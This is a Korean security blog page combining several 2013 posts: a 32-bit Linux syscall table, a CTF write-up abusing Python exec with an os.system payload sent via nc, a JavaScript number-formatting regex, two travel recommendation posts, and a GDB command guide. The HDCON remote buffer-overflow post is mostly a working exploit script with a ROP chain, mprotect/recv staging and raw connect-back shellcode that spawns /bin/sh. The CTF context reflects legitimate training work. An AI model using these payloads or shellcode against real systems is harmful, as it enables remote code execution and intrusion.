2013. 7. 21. 01:17

32bit unistd.h System call Number

System_Hacking

[64비트에서는 이놈들이 어디 있는겨? -_-... 복사 해놨다가. 그때그때 찾아써야겠다..]


/usr/linux/asm/unistd.h  32bit unistd.h System call Number 


#define __NR_exit 1    - move extended read/write file pointer

#define __NR_fork 2   - create a new process

#define __NR_read 3  - read from file

#define __NR_write 4

#define __NR_open 5

#define __NR_close 6

#define __NR_waitpid 7

#define __NR_creat 8

#define __NR_link 9

#define __NR_unlink 10

#define __NR_execve 11

#define __NR_chdir 12

#define __NR_time 13

#define __NR_mknod 14

#define __NR_chmod 15

#define __NR_lchown 16

#define __NR_break 17

#define __NR_oldstat 18

#define __NR_lseek 19

#define __NR_getpid 20

#define __NR_mount 21

#define __NR_umount 22

#define __NR_setuid 23

#define __NR_getuid 24

#define __NR_stime 25

#define __NR_ptrace 26

#define __NR_alarm 27

#define __NR_oldfstat 28

#define __NR_pause 29

#define __NR_utime 30

#define __NR_stty 31

#define __NR_gtty 32

#define __NR_access 33

#define __NR_nice 34

#define __NR_ftime 35

#define __NR_sync 36

#define __NR_kill 37

#define __NR_rename 38

#define __NR_mkdir 39

#define __NR_rmdir 40

#define __NR_dup 41

#define __NR_pipe 42

#define __NR_times 43

#define __NR_prof 44

#define __NR_brk 45

#define __NR_setgid 46

#define __NR_getgid 47

#define __NR_signal 48

#define __NR_geteuid 49

#define __NR_getegid 50

#define __NR_acct 51

#define __NR_umount2 52

#define __NR_lock 53

#define __NR_ioctl 54

#define __NR_fcntl 55

#define __NR_mpx 56

#define __NR_setpgid 57

#define __NR_ulimit 58

#define __NR_oldolduname 59

#define __NR_umask 60

#define __NR_chroot 61

#define __NR_ustat 62

#define __NR_dup2 63

#define __NR_getppid 64

#define __NR_getpgrp 65

#define __NR_setsid 66

#define __NR_sigaction 67

#define __NR_sgetmask 68

#define __NR_ssetmask 69

#define __NR_setreuid 70

#define __NR_setregid 71

#define __NR_sigsuspend 72

#define __NR_sigpending 73

#define __NR_sethostname 74

#define __NR_setrlimit 75

#define __NR_getrlimit 76

#define __NR_getrusage 77

#define __NR_gettimeofday 78

#define __NR_settimeofday 79

#define __NR_getgroups 80

#define __NR_setgroups 81

#define __NR_select 82

#define __NR_symlink 83

#define __NR_oldlstat 84

#define __NR_readlink 85

#define __NR_uselib 86

#define __NR_swapon 87

#define __NR_reboot 88

#define __NR_readdir 89

#define __NR_mmap 90

#define __NR_munmap 91

#define __NR_truncate 92

#define __NR_ftruncate 93

#define __NR_fchmod 94

#define __NR_fchown 95

#define __NR_getpriority 96

#define __NR_setpriority 97

#define __NR_profil 98

#define __NR_statfs 99

#define __NR_fstatfs 100

#define __NR_ioperm 101

#define __NR_socketcall 102

#define __NR_syslog 103

#define __NR_setitimer 104

#define __NR_getitimer 105

#define __NR_stat 106

#define __NR_lstat 107

#define __NR_fstat 108

#define __NR_olduname 109

#define __NR_iopl 110

#define __NR_vhangup 111

#define __NR_idle 112

#define __NR_vm86old 113

#define __NR_wait4 114

#define __NR_swapoff 115

#define __NR_sysinfo 116

#define __NR_ipc 117

#define __NR_fsync 118

#define __NR_sigreturn 119

#define __NR_clone 120

#define __NR_setdomainname 121

#define __NR_uname 122

#define __NR_modify_ldt 123

#define __NR_adjtimex 124

#define __NR_mprotect 125

#define __NR_sigprocmask 126

#define __NR_create_module 127

#define __NR_init_module 128

#define __NR_delete_module 129

#define __NR_get_kernel_syms 130

#define __NR_quotactl 131

#define __NR_getpgid 132

#define __NR_fchdir 133

#define __NR_bdflush 134

#define __NR_sysfs 135

#define __NR_personality 136

#define __NR_afs_syscall 137 /* Syscall for Andrew File System */

#define __NR_setfsuid 138

#define __NR_setfsgid 139

#define __NR__llseek 140

#define __NR_getdents 141

#define __NR__newselect 142

#define __NR_flock 143

#define __NR_msync 144

#define __NR_readv 145

#define __NR_writev 146

#define __NR_getsid 147

#define __NR_fdatasync 148

#define __NR__sysctl 149

#define __NR_mlock 150

#define __NR_munlock 151

#define __NR_mlockall 152

#define __NR_munlockall 153

#define __NR_sched_setparam 154

#define __NR_sched_getparam 155

#define __NR_sched_setscheduler 156

#define __NR_sched_getscheduler 157

#define __NR_sched_yield 158

#define __NR_sched_get_priority_max 159

#define __NR_sched_get_priority_min 160

#define __NR_sched_rr_get_interval 161

#define __NR_nanosleep 162

#define __NR_mremap 163

#define __NR_setresuid 164

#define __NR_getresuid 165

#define __NR_vm86 166

#define __NR_query_module 167

#define __NR_poll 168

#define __NR_nfsservctl 169

#define __NR_setresgid 170

#define __NR_getresgid 171

#define __NR_prctl 172

#define __NR_rt_sigreturn 173

#define __NR_rt_sigaction 174

#define __NR_rt_sigprocmask 175

#define __NR_rt_sigpending 176

#define __NR_rt_sigtimedwait 177

#define __NR_rt_sigqueueinfo 178

#define __NR_rt_sigsuspend 179

#define __NR_pread 180

#define __NR_pwrite 181

#define __NR_chown 182

#define __NR_getcwd 183

#define __NR_capget 184

#define __NR_capset 185

#define __NR_sigaltstack 186

#define __NR_sendfile 187

#define __NR_getpmsg 188 /* some people actually want streams */

#define __NR_putpmsg 189 /* some people actually want streams */

#define __NR_vfork 190

#define __NR_ugetrlimit 191 /* SuS compliant getrlimit */

#define __NR_mmap2 192

#define __NR_truncate64 193

#define __NR_ftruncate64 194

#define __NR_stat64 195

#define __NR_lstat64 196

#define __NR_fstat64 197

#define __NR_lchown32 198

#define __NR_getuid32 199

#define __NR_getgid32 200

#define __NR_geteuid32 201

#define __NR_getegid32 202

#define __NR_setreuid32 203

#define __NR_setregid32 204

#define __NR_getgroups32 205

#define __NR_setgroups32 206

#define __NR_fchown32 207

#define __NR_setresuid32 208

#define __NR_getresuid32 209

#define __NR_setresgid32 210

#define __NR_getresgid32 211

#define __NR_chown32 212

#define __NR_setuid32 213

#define __NR_setgid32 214

#define __NR_setfsuid32 215

#define __NR_setfsgid32 216

#define __NR_pivot_root 217

#define __NR_mincore 218

#define __NR_madvise 219

#define __NR_madvise1 219 /* delete when C lib stub is removed */

#define __NR_getdents64 220

#define __NR_fcntl64 221

#define __NR_security 223 /* syscall for security modules */

#define __NR_gettid 224

#define __NR_readahead 225

#define __NR_setxattr 226

#define __NR_lsetxattr 227

#define __NR_fsetxattr 228

#define __NR_getxattr 229

#define __NR_lgetxattr 230

#define __NR_fgetxattr 231

#define __NR_listxattr 232

#define __NR_llistxattr 233

#define __NR_flistxattr 234

#define __NR_removexattr 235

#define __NR_lremovexattr 236

#define __NR_fremovexattr 237

#define __NR_tkill 238

#define __NR_sendfile64 239

#define __NR_futex 240

#define __NR_sched_setaffinity 241

#define __NR_sched_getaffinity 242

#define __NR_set_thread_area 243

#define __NR_get_thread_area 244

/* #define __NR_io_setup 245 */

/* #define __NR_io_destroy 246 */

/* #define __NR_io_getevents 247 */

/* #define __NR_io_submit 248 */

/* #define __NR_io_cancel 249 */

/* #define __NR_alloc_hugepages 250 */

/* #define __NR_free_hugepages 251 */

#define __NR_exit_group 252

/* #define __NR_lookup_dcookie 253 */

/* #define __NR_sys_epoll_create 254 */

/* #define __NR_sys_epoll_ctl 255 */

/* #define __NR_sys_epoll_wait 256 */

/* #define __NR_remap_file_pages 257 */

#define __NR_set_tid_address 258

 


저작자표시 비영리 변경금지

'System_Hacking' 카테고리의 다른 글

[gdb] gdb find 의 활용 (원하는 메모리 값 찾기)  (0) 2013.10.09
[Shellcode] open-read-write(stdout)  (0) 2013.07.27
GDB 명령어 완벽 가이드  (0) 2013.06.10
[R.O.P.] ropeme 사용하여 ROP 가젯 쉽게 구하기.  (0) 2013.04.19
PLT & GOT 심층 분석.  (0) 2013.04.05
Posted by k1rha
2013. 7. 11. 22:59

HDCON 2013 neskjail 문제 ( python exec 함수의 문제 )

War_Game/system

HDCON 2013  neskjail 문제 ( python exec 함수의 문제


      exploiting by 광운~   


HDCON 본선문제로 python exec를 이용하는 문제 였다.

문제서버에는 neskjail 이라는 프로세스가 돌고 있었어야 했고, 중지 시 감점이 된다고한다(실제론 감점 안된듯?)



문제코드는 아래와 같다 약간의 난독화가 되어 있었는데, 같은 문자열을 치환시켜서 

대충 맞추면 소켓서버가 완성되었다. 파이썬 코드가 워낙 직관적이기에 쉽게 진행 할 수 있었다.



대충 보기좋게 치환한 코드는 아래와 같음.

#!/usr/bin/python

import socket

import os

import subprocess

import SocketServer

import sys


def MSG_CHECK ( msg ) :

if "N3Sk" in msg [ 50 : ] :

return "NESK"

else :

return "PESK"


def OPEN_READ_CHECK ( msg ) :

if "open" in msg or "read" in msg :    // msg 에 read 나 open 이 있으면 false  두개가 없으면 NESK

return "false"

else :

return "NESK"  


def CHECK_50_N3Sk ( sock ) :

sock . send ( "UNEXPLOITABLE!\n" )   


class EchoHandler ( SocketServer . BaseRequestHandler ) :

def handle ( self ) :

MESSAGE = self . request . recv ( 200 ) . strip ( )    // 띄어쓰기없이 200바이트를 받아들임

try :

if len ( MESSAGE ) > 5 :

RECV_RESULT = MSG_CHECK ( MESSAGE )  

//  문자열이 5글자 이상이면 MSG_CHECK를 함  50번째 이후에 N3Sk가 있어야 NESK를 리턴 


if RECV_RESULT == "NESK" :  // msg 50번째 이후에 N3Sk가 있으면 참 값..

try :

if OPEN_READ_CHECK ( MESSAGE ) == "NESK" :   

                                                                               // OEPN_READ 함수의 값이 NESK 이면(즉 open read가 없으면)

       //이부분에서 open 이나 read 함수를 쓸수 없다는 것을 말함.


exec MESSAGE //MSG를 실행함.

except :

return

else :

CHECK_50_N3Sk ( self . request )


except KeyError , IIII :

pass


if __name__ == "__main__" :

SOCK_SERVER = SocketServer . TCPServer ( ( "localhost" , 7997 ) , EchoHandler )

SOCK_SERVER . serve_forever ( )





조건은 정리해 보면 아래와 같다.


0. 상대방은 7997 로 서버프로그램을 하나 돌리고 있다.

1. 50번째부터 N3Sk 란 문자열이 있어야한다.

2. read 나 open 함수를 사용 할 수는 없다.

3. exec 에 들어갈 파이썬 코드는 key 값을 읽을 수 있어야 한다. 

4. exec 안에 들어갈 파이썬 코드는 문법상 오류가 생기면 않된.

5. 실행된 결과 값은 나에게 다시 전송시켜 줘야 한다. (데몬은 상대방 서버에서 돌기 때문)


이 문제는 python 의 exec 는 파이썬 코드 자체를 실행 시킬수 있다는 점을 이용한 문제 + 소켓 디스크립트에 직접 파일을 쓸수 있는가 하는 문제이다. 소켓 디스크립트는  4번을 쓴다.


PAYLOAD는 다음과 같다.  


[import os;os.system('cat key > &4');][ A * 50 ] [ N3Sk 문자열.. 하지만 파이썬 문법에 어긋나면안됨] |  nc [ 상대방 서버 ] [서버의 포트 ]


위와 같은 페이로드가 맞으면 exec 는 os.system 함수를 호출하고 system 함수는 cat key를 실행하여 client socket 디스크립트로

전송시킨다. 이때 실행코드로 들어가기 위해서는 N3Sk 란 글자가 50번째 이후에 반드시 존재하여야 한다. 


connection 이 맺어진 뒤 client socket descript 로 전송하게 되면 Client 화면에 키 값이 출력 된다.


위와같은 결과값을 상대방 서버에 접속한다.



root@k1rha:/HACK/HDCON# 

python -c 'print "import os;os.system(\"cat key >&4 \");"+"A"*50+"N3Sk=0"' | nc 127.0.0.1 7997


Get key succcess 


root@k1rha:/HACK/HDCON# 











저작자표시 비영리 변경금지

'War_Game > system' 카테고리의 다른 글

2013 HDCON REMOTE BOF  (0) 2013.06.17
[ L.O.B ] 페도라 원정대 4 dark_stone -> cruel  (0) 2013.04.28
LOB Fedora 원정대 ( evil_wizard -> dark_stone )  (0) 2013.04.14
LOB Fedora BOF GOT overwrite (hell_fire -> evil_wizard)  (0) 2013.04.07
[LOB] 페도라 원정대 3 (dark_eyes -> hell_fire)  (0) 2013.04.01
Posted by k1rha
2013. 7. 10. 00:02

정규 표현식으로 금액 (,) 표기 하기

Web_Programma

<script language="javascript">


function commify(n) {

  var reg = /(^[+-]?\d+)(\d{3})/;   // 정규식

  n += '';                          // 숫자를 문자열로 변환


  while (reg.test(n))

    n = n.replace(reg, '$1' + ',' + '$2');


  return n;

}



정규 표현식 으로 금액 (,) 표기 하기 금액을 표기해주는 함수는 없는듯하다.

이렇게해서 그때그때 잘 써먹어야지..





저작자표시 비영리 변경금지

'Web_Programma' 카테고리의 다른 글

[CGI 개발] html 전송 방식 CGI 로 처리하기  (0) 2013.11.24
[cgi] CGI로 POST 값 받아 처리 하기  (0) 2013.11.18
PHP XSS (cross site scripting) filter function  (0) 2013.03.10
타이핑 효과 내는 자바스크립트 코드 (Javascript Code to typing effect)  (0) 2012.12.03
정규표현식 한글까지 체크~!  (0) 2012.10.24
Posted by k1rha
2013. 6. 17. 17:30

2013 HDCON REMOTE BOF

War_Game/system

HDCON REMOTE BOF 


Hacked by singi , exploiting & report by 광운



hdconNo5_exp.py

luckyzzang



공격 페이로드는 아래와 같다.


STAGE1 = SEND + PPPR + SOCKFD + GOT_TIME + VALUE_0x4 + NULL + \

              FUNC + AAAA + SOCKFD


STAGE2 = MPROTECT + PPPR + CUSTOM_STACK + SIZEOF_CUSTOM + MODE_EXEC +\

               RECV + RETURN_CUSTOM + SOCKFD + CUSTOM_STACK + SHELLCODELEN + NULL


STAGE3 = SELLCODE



from socket import *

import sys

import struct


SHELLCODE ="\x31\xdb\xf7\xe3\xb0\x66\x53\x43\x53\x6a\x02\x89\xe1\xcd\x80\x93\x6a\x02\x59\xb0\x3f\xcd\x80\x49\x79\xf9\x68\x7f\x00\x00\x01\x66\x68\x22\xb8\x66\xb9\x02\x00\x66\x51\x89\xe1\x6a\x10\x51\x53\x89\xe1\xb0\x66\x31\xdb\x43\x43\x43\xcd\x80\xb0\x0b\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x89\xe2\x53\x89\xe1\xcd\x80"

SHELLCODELEN = struct.pack('<L', len(SHELLCODE))


PLT_SEND = 0x08048610

GOT_TIME = 0x804a004

ADDR_FUNC = 0x080486d4


PPPR = struct.pack('<L', 0x804878d)

PPPPR = struct.pack('<L', 0x80489cc)

STAGE1 = '\x41' * 1036 + struct.pack('<L', PLT_SEND) + PPPPR + '\x04\x00\x00\x00' + struct.pack('<L', GOT_TIME)

STAGE1 += '\x04\x00\x00\x00' + '\x00\x00\x00\x00' +struct.pack('<L', ADDR_FUNC) + '\x41\x41\x41\x41' + '\x04\x00\x00\x00'


if __name__ == '__main__':

s = socket(AF_INET, SOCK_STREAM)

s.connect(('127.0.0.1', 7777))


s.recv(1024)

s.send(STAGE1)


ADDR_TIME = struct.unpack('<L', s.recv(4))[0]


ADDR_MPROTECT = ADDR_TIME + 0x41B70

ADDR_RECV = ADDR_TIME + 0x48080


STAGE2 = '\x41' * 1036 + struct.pack('<L',ADDR_MPROTECT ) + PPPR + '\x00\x80\x04\x08' + '\x00\x10\x00\x00'

STAGE2 += '\x07\x00\x00\x00' + struct.pack('<L', ADDR_RECV) + '\x91\x87\x04\x08' + '\x04\x00\x00\x00'

STAGE2 += '\x91\x87\x04\x08' + SHELLCODELEN + '\x00\x00\x00\x00'


s.recv(1024)

s.send(STAGE2)

s.send(SHELLCODE)


s.close()




저작자표시 비영리 변경금지

'War_Game > system' 카테고리의 다른 글

HDCON 2013 neskjail 문제 ( python exec 함수의 문제 )  (0) 2013.07.11
[ L.O.B ] 페도라 원정대 4 dark_stone -> cruel  (0) 2013.04.28
LOB Fedora 원정대 ( evil_wizard -> dark_stone )  (0) 2013.04.14
LOB Fedora BOF GOT overwrite (hell_fire -> evil_wizard)  (0) 2013.04.07
[LOB] 페도라 원정대 3 (dark_eyes -> hell_fire)  (0) 2013.04.01
Posted by k1rha
2013. 6. 17. 16:02

정선 짚 와이어; 태백 백두대간협곡열차;대관령 양떼목장

여행 하기 좋은 곳

요즘 날씨도 더워지고 있지만, 아직 피서철(성수기)은 아니기에

요즘 여행을 갈 수 있는 적기 인 것 같습니다.

몇가지 추천을 해보려고 합니다.^^


1. 정선 짚와이어



놀이기구를 못타는 사람이더라도 도전(?) 할 만한 곳입니다. 내려가면서 보는 경치는 그야말로

장관이라고 할 수 있습니다. 1인당 가격은 4만원이고, 전화를 통해서 예약하시는 것이 좋습니다.

짚와이어를 타면 스카이워크는 무료로 즐기수 있다고 하네요^^


2. 태백 백두대간협곡열차(V-Train)



백두대간협곡열차 철암~분천으로 가는 기차중에서 관광용으로 통유리로 제작하여 운행하고 있는데요.

27.7km를 운행하며, 시속 30km/h로 느리게 가기때문에 사진을 찍기에 제격입니다.^^

또한 가격도 1인당 8400원으로 저렴하기 때문에 시원한 계곡을 즐기기에 좋은 것 같습니다.

예매 방법은 코레일 홈페이지나 App을 가지고 출발 - 철암(or 분천) / 도착 - 분천(or 철암)으로 하셔서

새마을호 486X 번호를 가진 열차를 예매하시면 됩니다.


3. 대관령 양떼목장(삼양목장)



대관령에 여러개의 목장이 있는거 아십니까? 그중에서 추천하는 곳은 삼양목장입니다.

왜 삼양이냐? 삼양라면을 만드는 삼양에서 목장을 운영하고 있기 때문이지요.^^

들어가시면 라면이나 과자들을 매우 싸게 구매하실수 있습니다. 

600여 만평으로 너무 커서 전망대까지 셔틀버스로 관광을 하셔야합니다.

총 5개의 목책로가 있는데, 버스를 타면 전망대에서 내려주고, 내려오면서 구간의 시작지점에서

버스가 정차하여서 걸어다니면서 구경하시면 됩니다.

참고로 삼양목장으로 가실때에는 차가 거의 필수적입니다. 택시를 타고 간다고 해도,

돌아올때는 콜택시를 불러도 기사님이 오지 않는 답니다.^^;;;;;

요금은 인당 8000원이고, 6월은 오후 5시 30분까지 운영합니다.


모두 제가 다녀온 곳인데요~^^정말 강추하는 세곳입니다.

앞으로 서울이나 국내 여행지를 앞으로 시리즈로 소개할까합니다.^^

이성친구가 있는 회원들은 항상 데이트 장소에 대해서 고민하기 때문에 공유차원에서...^^;;

그럼 다음 회(?)에서 봐요^^(반응 봐서....ㅋㅋ) 



저작자표시 비영리 변경금지

'여행 하기 좋은 곳' 카테고리의 다른 글

동작대교 까페 ; 부암동 산모퉁이 까페; 반포대교  (0) 2013.06.17
Posted by k1rha
2013. 6. 17. 16:01

동작대교 까페 ; 부암동 산모퉁이 까페; 반포대교

여행 하기 좋은 곳

이번 국여소 2탄은 서울에 가볼만한 데이트 장소를 소개하고자 합니다.^^

물론 다 제가 가본 곳 이지요~^^ 직접 가보았기 때문에 검증(?) 된 곳이라고 할 수 있겠네요.


1.  동작 대교 노을 카페



이 사진은 제가 직접 핸드폰으로 찍은 사진인데요^^

이름이 노을카페인 것 처럼 노을 시간 때에 가시서 멋진 노을을 바라보고 이어서 야경까지 보며, 데이트를 할 수 있는 곳입니다.

음료 가격대는 8천원~1만원 정도하고 음식도 팔긴 하지만 별로 추천해드리고 싶지는 않습니다.

음식을 먹는 분위기는 아닌 듯해요(먼가 어수선함ㅋ자리 싸움?)

가는 방법은 동작대교 건너는 버스를 타시거나 자차를 이용하시면 바로 앞에 주차장이 있으니 주차하시고 이용하면 됩니다.


2. 부암동 산모퉁이 카페



이 또한 제가 직접 찍은 사진입니다. 부암동이라고 하면 생소하게 생각하는 분들도 있을텐데요.

북악스카이웨이는 들어보셨나요? 그 주위에 있는 부암동 카페 입니다.

풍경이 너무나도 아름다운 곳입니다. 하지만 단점은 그만큼 사람들이 너무 많다는 것입니다.

너무 유명해져서 일본인 중국인 관광객까지 오면서 너무 시끌벅적 합니다.

주중에 가면 조금 한가하다고 하는데요. 학생들에게 주중은 자유로울 수 있으니 추천합니다.

또한 주차공간이 없어서 택시를 타고 가시거나 버스를 타고 주위에 내려서 운동겸(?) 걸어가는 것을 추천합니다.

가격대는 1만원 안밖입니다.^^


3. 잠수교(반포대교) 분수



이 사진은 제가 아는 지인이 DSLR로 찍은 사진입니다.

마지막으로 소개할 곳은 잠수교 분수쇼인데요. 저도 우연치 않게 가서 정말 즐겁게 보아서 추천드립니다.

당연히 무료구요. 밤 8시 이후로 가야 어두워서 멋있게 보이겠죠?

분수 시간을 같이 넣어두니까 참고하시면 될 것 같네요^^


모두 가본 곳 중에서 좋았던 곳들을 나열해 보았어요~^^

더 좋은 곳도 많아서 소개해줄 곳이 많네요^^ 이번 주에 이성친구와 함께 가보세요^^ 


없으면..............................


.....................


...........



.........


.......


....


..


.



저작자표시 비영리 변경금지

'여행 하기 좋은 곳' 카테고리의 다른 글

정선 짚 와이어; 태백 백두대간협곡열차;대관령 양떼목장  (0) 2013.06.17
Posted by k1rha
2013. 6. 10. 23:02

GDB 명령어 완벽 가이드

System_Hacking

 

gdb 사용법 ( 출처 : http://www.viper.pe.kr/docs/gdb-manual.html ) - 라이센스가 있을 경우 알려주세요.


자식 프로세스로 바로 분석 하는 법 : set follow-fork-mode child

 

 사용법 
 

help  

도움말, 명령어 분류 목록 출력

help [class]

해당 class에 속한 명령어 목록 표시

help [command]

해당 command에 대한 도움말 표시

    *** class와 command의 축약형도 지원됨

  명령어 분류 목록
 

running

프로그램 수행

support

지원 도구

stack  

스택 검사

user-defined

사용자 정의 명령

data  

데이타 검사

aliases

다른 명령어의 별칭

files

검사할 파일

obscure

기타

status

상태 조회

internals

유지보수 명령

breakpoints

어떤 포인트에서 프로그램을 중단하게 만듦

 

  프로그램의 수행 (running) 
 

show args

디버깅할 프로그램에 전달되는 argument를 보여준다.
이 명령어 다음에 몇 개의 argument가 온다.

info handle

프로그램이 각종 신호를 입력으로 받았을 때, 디버거의 동작법을 보여준다.

kill

디버깅 중인 프로그램의 실행을 취소한다.

target    

타겟 기계나 프로세스에 연결한다.
첫번째 argument는 타겟 기계의 타입이나 프로토콜이다. 나머지 argument는 타겟 프로토콜에 의해서 해석 되어진다. 특정 프로토콜에 작동하는 argument에 관해 추가 정보가 필요하면, [help target 프로토콜명]을 친다.

[target 서브 명령어 목록]
 

target exec  

타겟으로서 실행 파일을 사용한다.

target extended-remote

시리얼 라인을 경유해 떨어져 있는 컴퓨터를 타겟으로 사용

target remote

시리얼 라인을 경유해 떨어져 있는 컴퓨터를 타겟으로 사용

target core

타겟으로서 코어 파일을 사용한다.

target child

([run] 명령어에 의해 시작된) 유닉스의 자식 프로세스를 타겟으로 사용한다.

 

handle

신호를 어떻게 다룰지 상술함
argument는 신호와 그 신호에 적용할 동작이다. 심벌 신호(즉 SIGSEGV)가 권장 사항이지만, 1-15의 숫자 신호도 GDB의 이전 버젼과의 호환성을 위해 허용된다. 숫자 범위는 LOW-HIGH(즉 1-5)의 형태로 지정되어질 수 있다.
특별한 argument "all"은 대체로 SIGTRAP과 SIGINT처럼 디버거에 의해 사용되어지는 것을 제외한 모든 신호를 의미한다고 인식되어진다.
동작에는 "stop", "nostop", "print", "noprint", "pass", "nopass", "ignore", "noignore"가 있다.

 "stop"은 디버거로 다시 들어감을 의미한다("print"를 포함한다).   
 "print"는 메세지를 프린트함을 의미한다.
 "pass"는 프로그램이 이 신호를 인식할 수 있도록 함을 의미한다; 그렇지않으면 프로그램은 알 수 없다.
 "ignore"는 "nopass"와 같은 말이며, "noignore"도 "pass"와 같은 말이다.
 "pass"와 "stop"은 결합해서 사용할 수 있다.

run

디버깅할 프로그램의 수행을 시작한다.
전달할 argument를 지정할 수 있다. argument는 "*"나 "[..]"를 포함할 수도 있다; 쉘의 사용까지도 확장 될 수 있다. ">", "<", ">>" 같은 입출력 방향 재지정 기호도 또한 허용된다.
argument 없이, 마지막으로 지정된 argument를 사용할 수 있다("run" 또는 "set args"에 의해) 이전의 argument를 취소하고 argument 없이 실행하기 위해서, "set args" 를 argument 없이 사용하라.

continue

신호나 breakpoint 후에, 디버깅할 프로그램의 수행을 계속한다.
만약 breakpoint에서부터 진행된다면, 숫자 N이 argument로 사용되어질 수 있으며, 이는 breakpoint의 무시할 갯수가 N-1로 정해진다는 것을 의미한다. (그래서 breakpoint 가 N번째에 이를 때까지 분기하지 않는다)

jump

지정된 라인이나 주소에서 디버깅할 프로그램의 수행을 계속한다.
LINENUM이나 *ADDR을 argument로 준다.

until

프로그램이 현재 라인보다 큰 라인이나 또는 지정된 라인이나 어드레스 또는 함수에 도달할 때까지 수행한다(break 명령과 동일한 argument). 
실행은 현재의 스택 프레임으로 부터 빠져나오면서 중지될 것이다.

step

다른 소스 라인에 도달할 때까지 프로그램의 수행을 건너뛴다.
argument N은 이를 N번 수행하라는 의미다(또는 다른 이유로 인해 프로그램이 중지될 때까지).

next

서브루틴을 호출하여 진행하면서 프로그램의 수행을 건너뛴다.
서브루틴 호출이 발생하지 않는한 "step" 명령어와 같다.
이 명령어가 수행될 때, 호출은 하나의 명령으로 다루어진다.
argument N은 이를 N번 수행하라는 의미다(또는 다른 이유로 인해 프로그램이 중지될 때까지).

finish

선택된 스택 프레임이 리턴될 때까지 수행한다. 리턴되면서, 리턴되는 값은 출력되어지고 값 히스토리에 입력된다.

nexti

명령 하나를 건너뛰지만, 서브루틴 호출은 진행한다. argument N은 이를 N번 수행하라는 의미다(또는 다른 이유로 인해 프로그램이 중지될 때까지).     

stepi

정확하게 명령 하나를 건너 뛴다. argument N은 이를 N번 수행하라는 의미다(또는 다른 이유로 인해 프로그램이 중지될 때까지).

signal

argument에 의해 지정된 신호를 주면서 프로그램의 수행을 계속한다.
argument "0"은 신호를 주지 않으면서 프로그램을 계속 수행하라는 의미다.

detach

이전에 첨부된 프로세스나 파일을 제거하라. 만약 프로세스이면, 더 이상 추적할 필요 없이 수행을 계속한다. 만약 파일을 디버깅 중이라면, 그 파일은 닫히고 gdb는 더 이상 억세스 하지 않는다.

attach

GDB 바깥의 프로세스나 파일을 첨부한다. 이 명령어는 'target' 명령어처럼 다른 타겟에 부가되어진다('info files'는 당신의 타겟 스택을 보여줄 것이다).
이 명령어는 프로세스 id나 디바이스 파일을 argument로 가질 수 있다.
프로세스 id에 대해, 당신은 프로세스로 신호를 보낼 수 있는 권한을 가지고 있어야만 하며, 디버거와 똑같은 영향을 가지는 uid를 가지고 있어야 한다.
"attach" 명령을 사용할 때, 프로세스에서 프로그램 동작을 상술하며 심벌 테이블을 로딩하는 명령 "file"을 사용해야 한다.

unset environment  

프로그램에 대한 환경변수 VAR을 취소한다.
이 명령은 이후에 "run" 명령을 수행했을 때, 프로그램에 영향을 미친다.

tty

디버깅할 프로그램의 앞으로의 수행을 위해 터미널을 셋팅한다.

set environment

프로그램에 전달할 환경변수 값을 셋팅한다.
argument는 VAR VALUE인데, 여기에서 VAR은 변수명이고 VALUE는 값이다.
환경변수의 VALUE는 해석되지 않은 스트링이다. 이 명령은 이후에 "run" 명령을 수행했을 때, 프로그램에 영향을 미친다.

set args

프로그램이 시작될 때, 디버깅할 프로그램에 전달할 argument를 셋팅한다.
이 명령어 다음에 프로그램에 전달될 몇 개의 argument가 따라온다.

thread

thread간 스위칭을 위해 이 명령을 사용한다. 새로운 thread ID를 반드시 알고 있어야 한다.
 

thread

서브명령어의 목록

thread apply

thread 목록에 명령을 적용한다.

thread apply all

모든 thread에 명령어를 적용한다.

 

 

  스택을 검사 (stack)

    스택은 스택 프레임으로 구성되어진다. gdb는 스택 프레임에 번호를 지정한다.
    gdb는 가장 안쪽에 있는(현재 실행중인) 프레임에 대해 0번 부터 번호를 부여한다. 항상 gdb는 한 프레임을 선택된 프레임으로 간주한다. 변수 룩업은 선택된  프레임에 대하여 이루어진다. 디버깅 중인 프로그램이 정지될 때, gdb는 가장 안쪽에 있는 프레임을 선택한다. 아래 명령어들은 숫자나 어드레스에 의해서 선택된 다른 프레임에 대해서도 사용되어질 수도 있다.

     명령어 목록 

bt

모든 스택 프레임이나 가장 안쪽에 있는 COUNT 프레임의 backtrace를 출력한다. argument가 음수일 때, 가장 바깥쪽의 -COUNT 프레임을 출력한다.

backtrace

bt 명령어와 동일하다.

select-frame

아무런 출력 없이 스택 프레임을 선택한다. argument는 선택할 프레임을 상술한다. 그것은 스택 프레임 번호이거나 프레임  어드레스일 수도 있다.

frame

스택 프레임을 선택하고 출력한다.
argument 없이 사용하면, 선택된 스택 프레임을 출력한다("info frame" 참조) argument 는 선택할 프레임을 상술한다. 그것은 스택 프레임 번호이거나 프레임 어드레스일 수도 있다. argument와 같이 사용할 경우에, 입력이 명령 파일이나 사용자 정의 명령에 근거한다면 출력되는 것은 아무 것도 없다.

down

이 명령에 의해 호출된 스택 프레임을 선택하고 출력한다. argument는 얼마나 많은 프레임을 down 해야할지를 말해준다.

up

이 명령에 의해 호출된 스택 프레임을 선택하고 출력한다. argument는 얼마나 많은 프레임을 up 해야할지를 말해준다.

return

선택된 스택 프레임으로 하여금 호출자에게 리턴값을 돌려주도록 한다.
디버거에 제어가 남아 있지만 당신이 계속할 때, 실행은 현재 선택된 것보다 위에 있는 프레임에서 계속될 것이다.
만약 argument가 주어진다면, 리턴값에 대한 표현이다.


  데이타를 검사 (data)

     명령어 목록

whatis

expression EXP의 데이터 타입을 출력한다.

ptype

타입 TYPE의 정의를 출력한다. argument는 typedef, "struct STRUCT-TAG",  "class CLASS-NAME", "union UNION-TAG", "enum ENUM-TAG"에 의해 정의된 타입명이다.
선택된 스택 프레임의 어휘적인 문맥은 그 명칭을 찾는데 사용되어진다.

inspect

당신이 epoch 환경에서 실행중이라면 그 값이 자신의 창에 출력된다는 것을 제외하면 "print" 명령과 동일하다.

print

expression EXP의 값을 출력한다.

call

프로그램 내에 있는 함수를 호출한다. argument는 현재 작업중인 언어의 표기에서 함수명과 argument이다. void가 아니라면, 결과는 value history에 기록 되어지고 출력될 것이다.

set

변수 VAR 대해 표현 EXP와 지정된 결과를 계산한다.

output

"print"와 유사하지만, value history에 입력하지 않고 개행문자도 출력하지 않는다.

undisplay

프로그램이 정지할 때마다 출력되는 몇몇 표현을 취소한다.

disassemble

메모리의 특정 부분을 해체한다.
x 메모리를 검사한다. : x/FMT ADDRESS

delete display

display 기능을 삭제한다.

disable display

display 기능을 disable시킨다.

enable display

display 기능을 enable시킨다.


  특정 지점에서 프로그램을 정지시키기

